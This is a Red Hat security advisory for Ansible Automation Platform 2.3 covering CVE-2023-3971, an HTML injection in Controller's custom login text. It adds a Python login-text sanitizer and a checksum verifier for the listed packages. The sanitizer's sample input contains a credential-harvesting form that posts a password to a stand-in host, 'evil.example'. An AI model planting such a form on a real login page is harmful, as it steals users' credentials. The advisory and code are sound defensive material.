RHSA-2023:4590: Red Hat Security Advisory: Red Hat Ansible Automation Platform 2.3 Product Security and Bug Fix Update
An update is now available for Red Hat Ansible Automation Platform 2.3.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
Related CVEs:
- CVE-2023-3971: An HTML injection flaw was found in Controller in the user interface settings. This flaw allows an attacker to capture credentials by creating a custom login page by injecting HTML, resulting in a complete compromise.
Issued:
2023-08-09
Updated:
2023-08-09
Synopsis
Moderate: Red Hat Ansible Automation Platform 2.3 Product Security and Bug Fix Update
Type/Severity
Security Advisory: Moderate
Description
Red Hat Ansible Automation Platform provides an enterprise framework for building, deploying and managing IT automation at scale. IT Managers can provide top-down guidelines on how automation is applied to individual teams, while automation developers retain the freedom to write tasks that leverage existing knowledge without the overhead. Ansible Automation Platform makes it possible for users across an organization to share, vet, and manage automation content by means of a simple, powerful, and agentless language.
Security Fix(es):
- automation controller: Html injection in custom login info (CVE-2023-3971)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Additional changes for automation controller:
- automation-controller has been updated to 4.3.11 (AAP-14634)
- receptor has been updated to 1.4.1 (AAP-14641)
- Fixed server error that happens when deleting workflow jobs ran before event partitioning migration (AAP-7965)
- Fixed bug where users could get an erroneous 400 error when disabling or enabling a schedule (AAP-10943)
- Fixed bug causing screen to crash when changing credential type dropdown in launch prompt modal (AAP-11443)
- Fixed an issue with slow database 'UPDATE' statements when using nested tasks (include_tasks) causing task manager timeout (AAP-12585)
- Fixed bug where adding new labels to a job through prompting didn't work (AAP-14205)
- Re-enabled Pendo support by providing the correct Pendo API key (AAP-14214)
- Added noopener and noreferrer to Controller UI links that were missing it (AAP-14346)
- Updated links to docs from subscriptions page to reflect only major version being used (AAP-14376)
- Turned off autocomplete on remaining Controller UI forms that were missing that attribute (AAP-14443)
- Fixed bug where forms provided in the custom login info would render and execute (AAP-14627)
Other changes:
- Initial release of aap-metrics-utility (AAP-14116)
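CVE-2023-3971 and the related fix AAP-14627 both come down to the same defect: operator-supplied custom login text was rendered as live HTML, so a `<form>` placed there could collect credentials on the login page. The defensive pattern for such a field is allowlist sanitization rather than denylisting: keep only the handful of formatting tags a banner needs, drop every other tag, discard the entire content of active elements, and re-escape all text. The following is an added example written for this page, not Controller's own code; the tag and attribute allowlist, the `safe_href` rule and the sample input are this example's assumptions.

```python
from html import escape
from html.parser import HTMLParser

# Allowlist for formatted login text. The tag/attribute choice is this example's
# assumption, not Controller's policy.
ALLOWED_TAGS = {"p", "br", "b", "strong", "i", "em", "ul", "ol", "li", "a"}
ALLOWED_ATTRS = {"a": {"href"}}
VOID_TAGS = {"br"}
# Elements whose entire content is discarded, not merely their tags.
DROP_CONTENT = {"script", "style", "form", "iframe", "object", "embed"}


def safe_href(value: str) -> bool:
    """Only plain web and mail links survive; javascript:, data: and the like are rejected."""
    return value.strip().lower().startswith(("http://", "https://", "mailto:"))


class LoginInfoSanitizer(HTMLParser):
    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out: list[str] = []
        self.open_tags: list[str] = []
        self.skip_depth = 0  # > 0 while inside a DROP_CONTENT element

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return  # unknown tags (img, input, div, ...) vanish; their text is kept
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()) or value is None:
                continue  # drops every on* handler and style attribute
            if name == "href" and not safe_href(value):
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in self.open_tags:
            return  # stray or disallowed closing tag
        while self.open_tags:  # close up to and including the matching open tag
            top = self.open_tags.pop()
            self.out.append(f"</{top}>")
            if top == tag:
                break

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))  # text is never emitted raw

    def handle_comment(self, data):
        pass  # comments (including conditional comments) are dropped


def sanitize_login_info(raw_html: str) -> str:
    """Return a safe HTML fragment built only from allowlisted markup."""
    p = LoginInfoSanitizer()
    p.feed(raw_html)
    p.close()
    while p.open_tags:  # close anything the input left open
        p.out.append(f"</{p.open_tags.pop()}>")
    return "".join(p.out)


if __name__ == "__main__":
    # Constructed sample: legitimate banner text followed by a credential-harvesting form.
    sample = ('<p>Welcome to <b>corp</b> automation.</p>'
              '<form action="https://evil.example/collect"><input name="password"></form>')
    print(sanitize_login_info(sample))
```

Run on the sample, only the `<p>` banner survives; the form and its input are removed wholesale rather than escaped, so nothing interactive reaches the login page. Sanitizing at render time like this complements, rather than replaces, a Content-Security-Policy that forbids inline scripts and restricts `form-action`.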
Solution
Red Hat Ansible Automation Platform
Affected Products
- Red Hat Ansible Automation Platform 2.3 for RHEL 9 x86_64
- Red Hat Ansible Automation Platform 2.3 for RHEL 8 x86_64
- Red Hat Ansible Inside 1.1 for RHEL 9 x86_64
- Red Hat Ansible Inside 1.1 for RHEL 8 x86_64
- Red Hat Ansible Developer 1.0 for RHEL 9 x86_64
- Red Hat Ansible Developer 1.0 for RHEL 8 x86_64
Fixes
- BZ - 2226965 - CVE-2023-3971 Controller: Html injection in custom login info
Red Hat Ansible Automation Platform 2.3 for RHEL 9
SRPM
aap-metrics-utility-0.0.1-1.el9ap.src.rpm
SHA-256: 7f14df94f4c20333a97b119d362d6839208d6d5e5d07268dcf6165a70547f28f
automation-controller-4.3.11-1.el9ap.src.rpm
SHA-256: 9ee07adf5fa846a6f44adc5acd8b69ff932fa37f165085f04bfbe9e10c51024d
receptor-1.4.1-1.el9ap.src.rpm
SHA-256: 55d3fd42ea0337e1ae1dfea857189b13b97e57a3b1fe279f04282fcf82c0b356
x86_64
aap-metrics-utility-0.0.1-1.el9ap.noarch.rpm
SHA-256: 2301e65c3ce8e27881e03896f5cb721c08c3be7fd660113ed990ef77e69a3ec3
automation-controller-4.3.11-1.el9ap.x86_64.rpm
SHA-256: 2168b43483c0ece5c95a014331652c1b90bf3d03206cb9f686f012022617c0c0
automation-controller-cli-4.3.11-1.el9ap.x86_64.rpm
SHA-256: 54b3aa2454830d2e9c09bc71acce1c9348a6f8ad25e5231de22a1287b292933d
automation-controller-server-4.3.11-1.el9ap.x86_64.rpm
SHA-256: 99163dfa17eebd76f122eda5baa0cdfd974e27bb7bebc83cea1158e41d1338af
automation-controller-ui-4.3.11-1.el9ap.x86_64.rpm
SHA-256: ee51cc9fdef0ff468f3e909ace769ea6f08675e72e02f3e5df0230a97831ce58
automation-controller-venv-tower-4.3.11-1.el9ap.x86_64.rpm
SHA-256: 8630cbcab523dffc5976044bd5f6443bcb32ab05600617fb82d9cda590833d78
receptor-1.4.1-1.el9ap.x86_64.rpm
SHA-256: 8ed9b998593e0090e61cd9c5584631f8b54ce7cb185a44181107b32321faa0e7
receptorctl-1.4.1-1.el9ap.noarch.rpm
SHA-256: 33803c1e7319e87ab819153c5e456c34244c3f09e26d1a8df17842646c2edcde
Red Hat Ansible Automation Platform 2.3 for RHEL 8
SRPM
aap-metrics-utility-0.0.1-1.el8ap.src.rpm
SHA-256: ac14922f6e98dd1f23e14f925edc0f2b3cb6d4bc2534c11cd818764e3ae499c3
automation-controller-4.3.11-1.el8ap.src.rpm
SHA-256: 4f9de69b7284d9c7f243b52c20640a15ee2a8370a9df40551f83afb5f2d5428c
receptor-1.4.1-1.el8ap.src.rpm
SHA-256: 645a196c92f76e61b9a01c4e42c8a5db33fff05dec103a886bde8fb41ecbec76
x86_64
aap-metrics-utility-0.0.1-1.el8ap.noarch.rpm
SHA-256: e2aa035ac5bb4dff6aba61c52ad8c00b476921f5238c660302b6a3802beffe47
automation-controller-4.3.11-1.el8ap.x86_64.rpm
SHA-256: 7bdfd7ec024924aee4b0f00d5f423a9b3747a7c9a3eeb93aba6fe0f9d336b4a9
automation-controller-cli-4.3.11-1.el8ap.x86_64.rpm
SHA-256: 69443cd3fa76ae98df4e88cc31b22139d8737de205a9d6075f787eb4be11b9e7
automation-controller-server-4.3.11-1.el8ap.x86_64.rpm
SHA-256: 2f1b5171041b94f85260fcee9b0aa801d8063a26d0b81a5ee251653df0bc0bc1
automation-controller-ui-4.3.11-1.el8ap.x86_64.rpm
SHA-256: 00784ed8eebe88e1e8faac9dc93e261fda7c3a7db5125469dfcf15e62cb6e3ad
automation-controller-venv-tower-4.3.11-1.el8ap.x86_64.rpm
SHA-256: 7b8e605eab2ce9cb69ebd7bd3a8278436f829196aa3881d5a2824f9c58993970
receptor-1.4.1-1.el8ap.x86_64.rpm
SHA-256: e5f6f5fec1daae6087c2fe09e050b8af2fbe288d262d59cf5a677a2a8258bfc2
receptorctl-1.4.1-1.el8ap.noarch.rpm
SHA-256: 17d8bc11e4372481de53ca1a1b3c8d31164569f340a4f9a38cd9a5dd7cbdae11
Red Hat Ansible Inside 1.1 for RHEL 9
SRPM
receptor-1.4.1-1.el9ap.src.rpm
SHA-256: 55d3fd42ea0337e1ae1dfea857189b13b97e57a3b1fe279f04282fcf82c0b356
x86_64
receptorctl-1.4.1-1.el9ap.noarch.rpm
SHA-256: 33803c1e7319e87ab819153c5e456c34244c3f09e26d1a8df17842646c2edcde
Red Hat Ansible Inside 1.1 for RHEL 8
SRPM
receptor-1.4.1-1.el8ap.src.rpm
SHA-256: 645a196c92f76e61b9a01c4e42c8a5db33fff05dec103a886bde8fb41ecbec76
x86_64
receptorctl-1.4.1-1.el8ap.noarch.rpm
SHA-256: 17d8bc11e4372481de53ca1a1b3c8d31164569f340a4f9a38cd9a5dd7cbdae11
Red Hat Ansible Developer 1.0 for RHEL 9
SRPM
receptor-1.4.1-1.el9ap.src.rpm
SHA-256: 55d3fd42ea0337e1ae1dfea857189b13b97e57a3b1fe279f04282fcf82c0b356
x86_64
receptorctl-1.4.1-1.el9ap.noarch.rpm
SHA-256: 33803c1e7319e87ab819153c5e456c34244c3f09e26d1a8df17842646c2edcde
Red Hat Ansible Developer 1.0 for RHEL 8
SRPM
receptor-1.4.1-1.el8ap.src.rpm
SHA-256: 645a196c92f76e61b9a01c4e42c8a5db33fff05dec103a886bde8fb41ecbec76
x86_64
receptorctl-1.4.1-1.el8ap.noarch.rpm
SHA-256: 17d8bc11e4372481de53ca1a1b3c8d31164569f340a4f9a38cd9a5dd7cbdae11
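Before installing, a practitioner will want to confirm that the downloaded packages match the SHA-256 values listed above. The following Python script is an added example, not a Red Hat tool: it parses filename/SHA-256 pairs in the layout this advisory uses (the embedded excerpt copies three entries from the RHEL 9 SRPM list above) and checks files in a local directory against them, reporting each package as ok, mismatch or missing.

```python
import hashlib
import re
from pathlib import Path

# Constructed excerpt of the advisory's package list, copied from the page above.
# For real use, paste the full list for your product and architecture here.
ADVISORY_EXCERPT = """
Red Hat Ansible Automation Platform 2.3 for RHEL 9
SRPM
aap-metrics-utility-0.0.1-1.el9ap.src.rpm
SHA-256: 7f14df94f4c20333a97b119d362d6839208d6d5e5d07268dcf6165a70547f28f
automation-controller-4.3.11-1.el9ap.src.rpm
SHA-256: 9ee07adf5fa846a6f44adc5acd8b69ff932fa37f165085f04bfbe9e10c51024d
receptor-1.4.1-1.el9ap.src.rpm
SHA-256: 55d3fd42ea0337e1ae1dfea857189b13b97e57a3b1fe279f04282fcf82c0b356
"""

RPM_LINE = re.compile(r"^\S+\.rpm$")            # a package filename on its own line
HASH_LINE = re.compile(r"^SHA-256:\s*([0-9a-f]{64})$")  # the digest line that follows it


def parse_advisory(text: str) -> dict[str, str]:
    """Map each package filename to the SHA-256 digest printed directly after it."""
    expected = {}
    pending = None
    for raw in text.splitlines():
        line = raw.strip()
        if RPM_LINE.match(line):
            pending = line
            continue
        m = HASH_LINE.match(line)
        if m and pending:
            expected[pending] = m.group(1)
            pending = None
    return expected


def sha256_file(path: Path, chunk: int = 1 << 20) -> str:
    """Stream the file through SHA-256 so large RPMs do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def verify_downloads(directory, expected: dict[str, str]) -> dict[str, str]:
    """Return {filename: 'ok' | 'mismatch' | 'missing'} for every package in the advisory."""
    results = {}
    for name, digest in expected.items():
        path = Path(directory) / name
        if not path.is_file():
            results[name] = "missing"
        elif sha256_file(path) == digest:
            results[name] = "ok"
        else:
            results[name] = "mismatch"
    return results


if __name__ == "__main__":
    import sys
    directory = sys.argv[1] if len(sys.argv) > 1 else "."
    for name, status in verify_downloads(directory, parse_advisory(ADVISORY_EXCERPT)).items():
        print(f"{status:8} {name}")
```

A checksum match shows that the file on disk is the one the advisory describes; treat any mismatch as a reason to discard the download rather than install it. The package signature check (`rpm -K` against the Red Hat release key) remains the authoritative integrity check and should still be run before installation.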
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.